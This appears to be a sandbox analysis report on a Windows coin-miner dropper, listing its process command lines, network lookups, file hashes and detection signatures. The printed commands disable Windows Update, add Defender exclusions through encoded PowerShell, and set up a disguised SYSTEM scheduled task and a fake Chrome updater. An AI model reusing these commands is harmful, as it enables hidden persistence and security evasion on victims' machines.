C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

C:\Windows\Temp\miner2.exe

"C:\Windows\Temp\miner2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "duhwxeji"

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 183.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/2668-1-0x0000000000BD0000-0x0000000000E66000-memory.dmp

memory/2668-0-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/2668-2-0x0000000005990000-0x00000000059A0000-memory.dmp

memory/2668-3-0x0000000005760000-0x0000000005761000-memory.dmp

memory/2668-4-0x0000000006C30000-0x0000000006EC0000-memory.dmp

C:\Windows\Temp\miner2.exe

MD5 62afcd1ef8cc551eb1964d0cb430f123
SHA1 ea00351d96f8d76d2d4cc3e44ec29fb22e7350c8
SHA256 5dd1f49ef91ed01cfbe51bcb92018bca7040f4b0dc7290d1e73f9d0aa67d42c6
SHA512 372f789513456a39344f40b9cd719752df260c012883bfbd5f7f910e97b2818a938091c5b04a1cce74c283977ebcd81eba113c4a9924a2d66bd82090860161c3

C:\Windows\Temp\miner2.exe

MD5 0700fc94902c6e42789ae960494d1202
SHA1 a181a74eb120552e2bbf9462c4220681438258d6
SHA256 483d80529a8f2ee87bc662746b0791ef3c2b43ff080f2e5c5b2cede30cc896dd
SHA512 eb7792722db4026be03197dbda172f6cb8f9c73cfd9d378ff81f6dd860cec240b83a3654529cf66d09050a7ac50ed2333d5a3357283bc731df51e253d254358e

C:\Windows\Temp\miner2.exe

MD5 a93a015905fae3123019fe759964e99b
SHA1 a0c3f8c7df1e26be2c56f17bef76828a548a2e86
SHA256 80318968a692042fb60e6113f1f6bab36d71a322d9cdd4225810aa78faf865e8
SHA512 2b4c05458234c29807f60305e6185b243802f31e325f21c70e4b7681ec10407bf3a9aa977f02195c9851c07f02351292555a84e2421f40a49ddd212bcc02b1a1

memory/4340-17-0x0000000000720000-0x00000000009AE000-memory.dmp

memory/4340-18-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-19-0x000000001C510000-0x000000001C520000-memory.dmp

memory/4340-20-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

memory/1220-31-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1220-33-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-34-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-32-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-26-0x00000202FA640000-0x00000202FA662000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_amimpl1b.j5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1220-35-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-38-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/2668-39-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4340-40-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-41-0x000000001C4E0000-0x000000001C4F2000-memory.dmp

memory/4340-42-0x000000001C510000-0x000000001C520000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3332-53-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3332-54-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

memory/3332-55-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/3332-57-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

memory/3332-60-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-62-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/2064-64-0x00000289C5690000-0x00000289C56A0000-memory.dmp

memory/2064-63-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 c913447d9e5e79d4b48b15e74c4b7e8f
SHA1 98c297e75b01694ff07f3859a6dee3d7157d154c
SHA256 3d55687af7c3686bd0b26cdded48b9b637b18fadd4759339534efa30421cf2d1
SHA512 0823bedb69e8205ea24ab238a1b9b63667c93cf38d6b6b65984ca68f890ce42563c96f98391a8f6a2323d2c9aa5d468a69e6849b5a723e0fc4c1ea3d82e1325c

C:\Program Files\Google\Chrome\updater.exe

MD5 672ce418f5c580ae65310bcd716e9115
SHA1 a48737b94e2024cbe5a80b3d7de8bdac89e5f064
SHA256 57749f4e8374cb2eed1295f8ac2d063457b80c31bbb96966a11eb6e7de0d2809
SHA512 24a58f135eefb1775f429b088c9763ac3059549fad93e155fc6ba088be2227b1d0358eaf09436c59018363178b92d4cf674b1cf58bf0c4ee797477f702b03997

memory/1044-77-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/2064-79-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-81-0x0000000001C30000-0x0000000001C31000-memory.dmp

memory/1044-80-0x000000001B920000-0x000000001B930000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/1700-83-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1700-85-0x00000155015A0000-0x00000155015B0000-memory.dmp

memory/1700-84-0x00000155015A0000-0x00000155015B0000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2238871af228384f4b8cdc65117ba9f1
SHA1 2a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256 daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA512 1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

memory/1700-105-0x000001551A000000-0x000001551A01C000-memory.dmp

memory/1700-106-0x000001551A020000-0x000001551A0D5000-memory.dmp

memory/1700-107-0x000001551A0E0000-0x000001551A0EA000-memory.dmp

memory/1700-108-0x000001551A250000-0x000001551A26C000-memory.dmp

memory/1700-109-0x000001551A230000-0x000001551A23A000-memory.dmp

memory/1700-110-0x000001551A290000-0x000001551A2AA000-memory.dmp

memory/1700-111-0x000001551A240000-0x000001551A248000-memory.dmp

memory/1700-112-0x000001551A270000-0x000001551A276000-memory.dmp

memory/1700-113-0x000001551A280000-0x000001551A28A000-memory.dmp

memory/1700-114-0x00000155015A0000-0x00000155015B0000-memory.dmp

memory/1700-116-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-117-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-118-0x000000001B920000-0x000000001B930000-memory.dmp

memory/1044-119-0x0000000002820000-0x0000000002826000-memory.dmp

memory/3636-120-0x000001E8D68D0000-0x000001E8D68D7000-memory.dmp

memory/3636-122-0x000001E8D70C0000-0x000001E8D70C6000-memory.dmp

memory/3636-123-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-125-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-126-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-124-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/1044-128-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-129-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-130-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-131-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-132-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-19 18:47

Reported

2024-03-19 18:52

Platform

win11-20240221-en

Max time kernel

147s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Temp\miner2.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
